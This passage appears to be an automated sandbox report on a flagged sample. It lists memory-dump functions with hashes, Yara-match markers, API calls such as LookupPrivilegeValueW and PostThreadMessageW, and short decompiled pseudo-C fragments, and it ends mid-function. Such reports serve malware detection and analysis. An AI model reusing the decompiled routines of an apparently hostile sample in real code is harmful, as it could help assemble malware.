                                                • Opcode ID: a9b81d0c8e439d6c6e943486b5307b8272dd63a40e8b6122a8003d5c7553d693
                                                • Instruction ID: 02030818c28be42240cb4a7f94c9c408c26e47f9381a1de2c1f3f6a6cb99600d
                                                • Opcode Fuzzy Hash: a9b81d0c8e439d6c6e943486b5307b8272dd63a40e8b6122a8003d5c7553d693
                                                • Instruction Fuzzy Hash: 3490027160500413D11261DA45047070009A7D0281F91C423A041455DDD7F68956B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: fba8b16cad757dec6f13235156950dcf0e817a90ffc27905ff112acbfcb47562
                                                • Instruction ID: 7c332a59f96361c2f5d9b954fc7c36f7873a95e4aa59d3ef65ceb08907ecc338
                                                • Opcode Fuzzy Hash: fba8b16cad757dec6f13235156950dcf0e817a90ffc27905ff112acbfcb47562
                                                • Instruction Fuzzy Hash: 75900261646041525546B1DA44045074006B7E0281791C023A1404955CC6B6985AE661
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 855ab699d2aa6a94a6b9a0b899d7bd6d09354059badec10a6f76fd951e392184
                                                • Instruction ID: b79df3e3779f0c30851a059ba9d97b5aa81ef3b21db905113a914a94bf858ad9
                                                • Opcode Fuzzy Hash: 855ab699d2aa6a94a6b9a0b899d7bd6d09354059badec10a6f76fd951e392184
                                                • Instruction Fuzzy Hash: 0F900261A0500502D10271DA4404616000AA7D0281F91C033A101455AECBB58996B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: eb5de665f96c636246a80b4e4dfc93eb6e370ccedacb22abe9a035784e0f7cea
                                                • Instruction ID: 912b7dbeb22072347d626d315aba71e293c4b1c9ede996b6ffb585b9d500e42a
                                                • Opcode Fuzzy Hash: eb5de665f96c636246a80b4e4dfc93eb6e370ccedacb22abe9a035784e0f7cea
                                                • Instruction Fuzzy Hash: FF900261A0500042414171EA88449064005BBE1251751C132A0988555DC6F9886966A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 05c80f4efc22c80ca0c7093ffbeb4a83325b2550c9207cc0af75d68c206b3260
                                                • Instruction ID: 433215624b3ccb8dd2515de18e319fbeec6b10ab2fe66f9ec7cb937c3e921694
                                                • Opcode Fuzzy Hash: 05c80f4efc22c80ca0c7093ffbeb4a83325b2550c9207cc0af75d68c206b3260
                                                • Instruction Fuzzy Hash: 5190027160540402D10161DA481470B0005A7D0342F51C022A115455ADC7B5885575B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 99aa22e6b8204fde8089400411e1b8a4a96aee4b36f47b30487fbb557581eac5
                                                • Instruction ID: 4bcb179e95c25ad39d2d12f52b20e0749794e335c5ec52bd6dbd27fd44f5dfe5
                                                • Opcode Fuzzy Hash: 99aa22e6b8204fde8089400411e1b8a4a96aee4b36f47b30487fbb557581eac5
                                                • Instruction Fuzzy Hash: F990026161580042D20165EA4C14B070005A7D0343F51C126A0144559CCAB588656561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b97c0da23f48aaabcb60a3ff6c0715b4e6c5dba1b0caa47835b1220146b3e56f
                                                • Instruction ID: 06caff9ea86a1f8adc126000f08f7e2c41278e297912ee1c759291f7e3fd852d
                                                • Opcode Fuzzy Hash: b97c0da23f48aaabcb60a3ff6c0715b4e6c5dba1b0caa47835b1220146b3e56f
                                                • Instruction Fuzzy Hash: 69900265615000030106A5DA07045070046A7D5391351C032F1005555CD7B188656161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e86e62bccbab8f00e5f1b1dd39f17d4ae2850451ea44694c2f2c17b0c384f479
                                                • Instruction ID: 48c811d70fc591884f5ea55c9215bdf503f60a8cff8e2404a25d477b47e409ae
                                                • Opcode Fuzzy Hash: e86e62bccbab8f00e5f1b1dd39f17d4ae2850451ea44694c2f2c17b0c384f479
                                                • Instruction Fuzzy Hash: 219002A160600003410671DA4414616400AA7E0241B51C032E1004595DC6B588957165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ef3081cc8e2fa28d86bbab5512e8fd8b23c6778ad6c73aa3cb3a4b5c4087ede8
                                                • Instruction ID: 38d6a6c4da5e1587c5358304700e9e013d426cad6666b0f6b0d5f0cac16ea1e2
                                                • Opcode Fuzzy Hash: ef3081cc8e2fa28d86bbab5512e8fd8b23c6778ad6c73aa3cb3a4b5c4087ede8
                                                • Instruction Fuzzy Hash: B290027160500402D10165DA54086460005A7E0341F51D022A501455AEC7F588957171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bed082f230c48019d78f4e4eb40c61b45068506e2a0f170bb43168cae91b32e3
                                                • Instruction ID: cab2da9b76e9f81506bea1dcdce045972739dfb44244d5eca0b3641aad1f4df9
                                                • Opcode Fuzzy Hash: bed082f230c48019d78f4e4eb40c61b45068506e2a0f170bb43168cae91b32e3
                                                • Instruction Fuzzy Hash: FD90026170500003D14171DA54186064005F7E1341F51D022E0404559CDAB5885A6262
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 90c3eb3e51b38cb98f7cb857878dca68611a203a54b0febc92df4d4c350ae48f
                                                • Instruction ID: 118858fe3636ce931bfb6a127778f7bc1ca645a05f48107f87e343cb3a631c2c
                                                • Opcode Fuzzy Hash: 90c3eb3e51b38cb98f7cb857878dca68611a203a54b0febc92df4d4c350ae48f
                                                • Instruction Fuzzy Hash: E790026961700002D18171DA540860A0005A7D1242F91D426A000555DCCAB5886D6361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d533d376e36eb29eaa5d5b15ac6a22b7c147e6fa3603997d1f9d4f7993f03b14
                                                • Instruction ID: 37a2504066af3394248f4ff1fcb8813751b981b25bb0ca880f40200290e6047d
                                                • Opcode Fuzzy Hash: d533d376e36eb29eaa5d5b15ac6a22b7c147e6fa3603997d1f9d4f7993f03b14
                                                • Instruction Fuzzy Hash: 7990027160500802D18171DA440464A0005A7D1341F91C026A0015659DCBB58A5D77E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 94a2b3b7ec01ac4ebb5985ff9020ee625dabfdf1776110d1951e48a1fd07dce0
                                                • Instruction ID: 12285a4464ce6f5b006601b1d8a452d9d9bcb1b94eaaaad3828713909394870b
                                                • Opcode Fuzzy Hash: 94a2b3b7ec01ac4ebb5985ff9020ee625dabfdf1776110d1951e48a1fd07dce0
                                                • Instruction Fuzzy Hash: 0F90027160508802D11161DA840474A0005A7D0341F55C422A441465DDC7F588957161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9952e6bd23a8cf809c7f1d31e2a2cdb1a3fa865c0c436f6c56225653b5eb434
                                                • Instruction ID: d694cef9faf7f89dfa5a46ff5172319f61a3d8f72cb1e00bbcbd9de5c112db06
                                                • Opcode Fuzzy Hash: a9952e6bd23a8cf809c7f1d31e2a2cdb1a3fa865c0c436f6c56225653b5eb434
                                                • Instruction Fuzzy Hash: 98210CB2D4020857CB25D665AD42BEF737CEB54314F44017FE949A3182F6387E49CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A0B2, Relevance: 3.0, APIs: 2, Instructions: 39memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A06D
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0E8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateExitHeapProcess
                                                • String ID:
                                                • API String ID: 1054155344-0
                                                • Opcode ID: 5acbc2f29420b948f33c84e0a20e9e5b07744d15dabfd69a9910973f2085a7f7
                                                • Instruction ID: 679946484fa0a0d18bf862b8c0638c9669471f6d3259722eb9c988c0ba941109
                                                • Opcode Fuzzy Hash: 5acbc2f29420b948f33c84e0a20e9e5b07744d15dabfd69a9910973f2085a7f7
                                                • Instruction Fuzzy Hash: A1F0FFB82092806FC710DF748C81DD77BA4AF81308B15498EE8C817203C134E95A8BB5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B870( &_v67, 0, 0x3f);
				E0041C410( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                0x004082f0
                                                0x004082ff
                                                0x00408303
                                                0x0040830e
                                                0x0040831e
                                                0x0040832e
                                                0x00408333
                                                0x0040833a
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x0040836b
                                                0x0040836b
                                                0x00000000
                                                0x0040836d
                                                0x00408372

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 39aaf3cc670cee8f115237a24b8965cf8fff7ea1e1d29afdbf43c901cc49f9bd
                                                • Instruction ID: dce78ad2e707cb95efefefea563c334a82ceef6f90d91f9eac1ede0513526d90
                                                • Opcode Fuzzy Hash: 39aaf3cc670cee8f115237a24b8965cf8fff7ea1e1d29afdbf43c901cc49f9bd
                                                • Instruction Fuzzy Hash: 5801FC31A4032877E720A6959C03FFF771C6B40F54F04401DFF04BA1C1D6A8690546FA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A187, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 16%
                                                			E0041A187(void* __eax, void* __edi, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28) {

				asm("clc");
				asm("fiadd dword [eax-0x7976ad65]");
				if (__eflags < 0) goto L3;
			}



                                                0x0041a187
                                                0x0041a188
                                                0x0041a18f

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A210
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 087bc34962611d943fe68b56a2e38bdbf28ff81d85d4978b37f481bc9bc8969c
                                                • Instruction ID: 4fc556190894547a1880767f24796d6bc78254e3457533ad855e3b921dc927e9
                                                • Opcode Fuzzy Hash: 087bc34962611d943fe68b56a2e38bdbf28ff81d85d4978b37f481bc9bc8969c
                                                • Instruction Fuzzy Hash: 6B015BB6200204AFCB14DF89CC44EEB37ADAF88354F018559FA0897251CA34E850CBF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A040, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A06D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: c2f75f23685a3a3035d26e43b004efde96b0f17027f721f1615bddf6f144c8a0
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 2DE012B5210208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A080, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A080(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A970(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a08f
                                                0x0041a097
                                                0x0041a0ad
                                                0x0041a0b1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A0AD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: fa613ce94130c294c78c644c3dc676460f5e04e644236c96d410f3cac1b6f185
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: 89E046B5210208ABDB18EF99CC49EE777ACEF88760F018559FE085B252C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A1E0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A1E0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _t7;
				int _t10;
				void* _t15;

				_t7 = _a4;
				E0041A970(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}






                                                0x0041a1e3
                                                0x0041a1fa
                                                0x0041a210
                                                0x0041a214

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A210
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: b2a81fd9bfa84999f98766bcaf5da6299346a0de5b601ff3a7585631ec016391
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 84E01AB52002086BDB10DF89CC85EE737ADAF88650F018555BA0857241C934E8508BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A0C0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A0C0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A970(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                0x0041a0c3
                                                0x0041a0da
                                                0x0041a0e8

                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0E8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: 8052c92922f0d0eedaab6b9fa37bf430534de0eb242e2dbe7c66c9c2d4c77ebf
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 2ED017766102187BD620EB99CC85FD777ACDF487A0F0184A9BA5C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 592e5d08d2f69d875fe40c9ddc69937f9781905c7c44aafe45f7bb1ec9f345d1
                                                • Instruction ID: 1b956ea2bfd1902cfcb39b5461498132de3a27cb46f82300392e1bf8e43f5672
                                                • Opcode Fuzzy Hash: 592e5d08d2f69d875fe40c9ddc69937f9781905c7c44aafe45f7bb1ec9f345d1
                                                • Instruction Fuzzy Hash: 11B09B71D054C5C5D612D7E547087177A007BD0755F16C066E2020645B8778C095F6B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0146B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                Download Yara Rule
                                                Strings
                                                • The critical section is owned by thread %p., xrefs: 0146B3B9
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 0146B48F
                                                • <unknown>, xrefs: 0146B27E, 0146B2D1, 0146B350, 0146B399, 0146B417, 0146B48E
                                                • read from, xrefs: 0146B4AD, 0146B4B2
                                                • a NULL pointer, xrefs: 0146B4E0
                                                • This failed because of error %Ix., xrefs: 0146B446
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0146B39B
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0146B53F
                                                • *** Inpage error in %ws:%s, xrefs: 0146B418
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0146B305
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0146B47D
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0146B476
                                                • *** then kb to get the faulting stack, xrefs: 0146B51C
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0146B3D6
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0146B2DC
                                                • The instruction at %p referenced memory at %p., xrefs: 0146B432
                                                • an invalid address, %p, xrefs: 0146B4CF
                                                • The resource is owned shared by %d threads, xrefs: 0146B37E
                                                • *** enter .exr %p for the exception record, xrefs: 0146B4F1
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0146B38F
                                                • *** enter .cxr %p for the context, xrefs: 0146B50D
                                                • Go determine why that thread has not released the critical section., xrefs: 0146B3C5
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 0146B352
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0146B2F3
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0146B484
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0146B314
                                                • write to, xrefs: 0146B4A6
                                                • The resource is owned exclusively by thread %p, xrefs: 0146B374
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0146B323
                                                • The instruction at %p tried to %s , xrefs: 0146B4B6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                • API String ID: 0-108210295
                                                • Opcode ID: 1bd5e9b8391d82050b322fabd079ef9a447f81f6ed7af52a1cee29e199364632
                                                • Instruction ID: 51bd470bebbc589ffcad11dc56272ebb051cdb209d3c83dcbd9eb35a9f4de8d5
                                                • Opcode Fuzzy Hash: 1bd5e9b8391d82050b322fabd079ef9a447f81f6ed7af52a1cee29e199364632
                                                • Instruction Fuzzy Hash: 1F81E475B40210FFEB259A4ADC45D6B3B29EF66A5DF80406AF504AF332D2718452C6B3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01471C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E01471C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x13948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E013BB150();
				} else {
					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x14a589c);
				E013BB150("Heap error detected at %p (heap handle %p)\n",  *0x14a58a0);
				_t27 =  *0x14a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01471E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E013BB150();
				} else {
					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E013BB150("Error code: %d - %s\n",  *0x14a5898);
				_t113 =  *0x14a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E013BB150("Parameter1: %p\n",  *0x14a58a4);
				}
				_t115 =  *0x14a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E013BB150("Parameter2: %p\n",  *0x14a58a8);
				}
				_t117 =  *0x14a58ac; // 0x0
				if(_t117 != 0) {
